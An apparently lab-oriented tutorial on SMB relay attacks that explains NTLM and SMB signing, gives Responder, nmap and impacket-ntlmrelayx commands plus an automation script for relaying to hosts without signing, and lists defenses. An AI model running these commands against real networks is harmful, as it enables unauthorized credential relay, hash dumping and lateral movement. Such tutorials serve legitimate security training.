SMB Relay

What is SMB?

SMB (Server Message Block) is the protocol Windows machines use to share files, printers and named pipes, and it is present in every Active Directory network (and any other Windows network).

Every Windows machine accepts inbound SMB connections by default. Originally SMB ran on top of NetBIOS (the datagram and session services, with the session service on 139/TCP), but modern Windows speaks SMB directly over TCP on port 445. Authentication inside SMB is done with either NTLM or Kerberos, and it is the NTLM path that the relay attack described below abuses.

                                 .--------
                                |
                                |
                              .---
                   .--NBSSN-->| 139
                   |          '---
         .-----.   |            |  Windows
         | SMB |>--|            |
         '-----'   |            |  machine
            |      |          .---
            |      '---TCP--->| 445
            |                 '---
            |                   |
            |                   |
            |                   '--------
     .------------.
     |            |
  .------.   .----------.
  | NTLM |   | Kerberos |
  '------'   '----------'

For an attacker SMB is worth knowing well: it exposes shares that often hold valuable information (scripts, backups, configuration files with credentials), it is a common channel for exfiltrating data from machines, and, as shown below, its NTLM authentication can be relayed.

What is SMB Relay?

Instead of cracking the NTLMv2 challenge/responses captured with Responder (which can take a long time or never succeed against a strong password), we can relay the authentication itself to another machine as it happens and authenticate there as the victim. The password is never needed. For an SMB relay attack to work the following must hold:

  • SMB signing must be disabled, or enabled but not required, on the target (a client that is allowed to skip signing is relayed unsigned)

  • The relayed user must be a local administrator on the target; otherwise we authenticate but cannot dump hashes or execute commands

  • The target must be a different machine from the one the authentication came from; relaying back to the originating host (reflection) has been blocked since MS08-068

What is SMB Signing?

SMB signing attaches a MAC to every SMB packet, computed from the session key derived during authentication. Because the relay server never learns that session key (it only forwards the challenge and the response; computing the key needs the user's NT hash), it cannot sign packets, so a target that requires signing simply drops the relayed session. If signing is enabled and required on a machine we will not be able to perform an SMB relay attack against it. Domain controllers require signing by default, which is why relay targets are usually member servers and workstations: the common workstation default of "enabled but not required" does not protect them.

Exploitation

Step 1: Configuration

Edit /usr/share/responder/Responder.conf and turn off Responder's own SMB and HTTP servers, because ntlmrelayx has to bind 445/tcp and 80/tcp itself. Responder keeps poisoning LLMNR, NBT-NS and mDNS so victims still connect to our host, but the connection is now answered by ntlmrelayx:

SMB = Off
...
HTTP = Off

Step 2: Run Responder

responder -I tun0 -dw

-I selects the interface Responder listens on (tun0 here, the VPN interface into the lab; use whichever interface faces the victims), -w starts the rogue WPAD proxy so browsers that auto-detect a proxy authenticate to us over HTTP, and -d enables answers to DHCP broadcasts in current Responder releases (older releases used -d for NetBIOS domain-suffix queries; check responder -h for the version in use).

Step 3: Discover hosts with SMB signing disabled

nmap --script=smb2-security-mode.nse -p445 <CIDR>

The script reads the SecurityMode field of the SMB2 NEGOTIATE response. Hosts that report "Message signing enabled and required" are not relayable; save every other host (typically "Message signing enabled but not required", the workstation default, or a "disabled" result) into targets.txt, one address per line.

Step 4: Use impacket-ntlmrelayx to get an SMB shell

impacket-ntlmrelayx -tf targets.txt -smb2support -i
nc 127.0.0.1 11000

-tf reads the target list, -smb2support lets the relay speak SMB2 to the targets, and -i opens an interactive SMB client instead of the default action (without -i, ntlmrelayx dumps the target's local SAM hashes with secretsdump when the relayed user is a local admin). Each successfully relayed session is bound to its own local port starting at 11000, so a second victim appears on 11001; attach with nc and use the shell's smbclient-style commands (help, shares, use).

Step 5: Wait for an event

Now wait for a victim to authenticate. Responder answers the LLMNR/NBT-NS name lookups that a machine falls back to when DNS fails (a user mistyping a share name, a mapped drive or scheduled task pointing at a server that no longer exists), so the victim connects to us and ntlmrelayx forwards the NTLM authentication to the hosts in targets.txt. Once a relay to a host where that user is a local admin succeeds, the shell on port 11000 is live and we win.
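The Step 3 to Step 4 flow as one shell script. This is an added example and not code from the original page: it assumes a Kali-style box with nmap and impacket-ntlmrelayx on PATH, root privileges (ntlmrelayx binds 445/tcp and 80/tcp), Responder already running as in Step 2 with its SMB and HTTP servers Off, and a hypothetical report file name smb-signing.txt. The function names, the CIDR in the usage comment and the sample nmap output used to check the parser are all my own.

```sh
#!/bin/sh
# Added example, not from the original page. Glue for steps 3 and 4:
# scan for hosts that do not require SMB signing, write targets.txt,
# then hand the list to ntlmrelayx. Assumes nmap and impacket-ntlmrelayx
# on PATH and root (ntlmrelayx has to bind 445/tcp and 80/tcp).
set -eu

# Read nmap normal output (-oN) of the smb2-security-mode script on stdin
# and print the address of every host whose result is anything other than
# "Message signing enabled and required". Those hosts accept unsigned
# sessions and are therefore relay candidates. "Enabled but not required"
# is the usual workstation default; domain controllers report "required".
extract_relay_targets() {
    awk '
        /^Nmap scan report for/ {
            # Last field is the IP, or "(IP)" when reverse DNS gave a name.
            ip = $NF
            gsub(/[()]/, "", ip)
            next
        }
        /Message signing/ {
            if ($0 ~ /enabled and required/) {
                ip = ""        # signing enforced: a relayed session is dropped
            } else if (ip != "") {
                print ip       # not required or disabled: relayable
                ip = ""
            }
        }
    '
}

# Scan a CIDR, build the target file and start ntlmrelayx with an
# interactive SMB client (-i).
# Usage (hypothetical range): scan_and_relay 10.10.10.0/24 targets.txt
scan_and_relay() {
    [ $# -ge 1 ] || { echo "usage: scan_and_relay CIDR [targets-file]" >&2; return 2; }
    cidr=$1
    targets=${2:-targets.txt}

    # -Pn: do not skip hosts that block ping; -oN keeps the report for re-use.
    nmap -Pn -p445 --script=smb2-security-mode -oN smb-signing.txt "$cidr" >/dev/null

    extract_relay_targets < smb-signing.txt > "$targets"
    if [ ! -s "$targets" ]; then
        echo "no host in $cidr accepts unsigned SMB; nothing to relay to" >&2
        return 1
    fi
    echo "relay targets:" >&2
    cat "$targets" >&2

    # ntlmrelayx listens on 445/tcp and 80/tcp itself (hence SMB = Off and
    # HTTP = Off in Responder.conf). Each successful relay gets its own
    # local port: 11000 for the first victim, 11001 for the next, and so on.
    # Attach from another terminal with: nc 127.0.0.1 11000
    impacket-ntlmrelayx -tf "$targets" -smb2support -i
}
```

Source the file (or paste the two functions into a root shell) and call scan_and_relay with the lab range; extract_relay_targets can also be run on its own against an existing nmap report to rebuild targets.txt without rescanning. The parser keys only on the "enabled and required" wording, so a host whose 445/tcp is closed or that produced no script output is silently left out.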

Defense

  • Enable SMB signing on all devices (Group Policy "Microsoft network server: Digitally sign communications (always)" plus the matching client setting)

    • Pro: Completely stops SMB relay; note that the same captured authentication can still be relayed to LDAP or HTTP, which need their own signing and channel-binding controls

    • Con: Can cause performance issues with large file copies (a 15% throughput loss is commonly cited)

  • Disable NTLM authentication on the network

    • Pro: Completely stops the attack, since there is nothing to relay

    • Con: Hard in practice; many legacy applications need NTLM, and whenever Kerberos cannot be used (access by IP address, non-domain hosts, missing SPNs) Windows falls back to NTLM

  • Account tiering

    • Pro: Limits domain admins to specific tasks (e.g. only log onto servers with need for DA), so a relayed workstation user is never a DA

    • Con: Enforcing the policy may be difficult

  • Local admin restriction

    • Pro: Prevents a lot of lateral movement, because a relayed user who is not a local admin on other machines gains nothing there

    • Con: Potential increase in the amount of service desk tickets
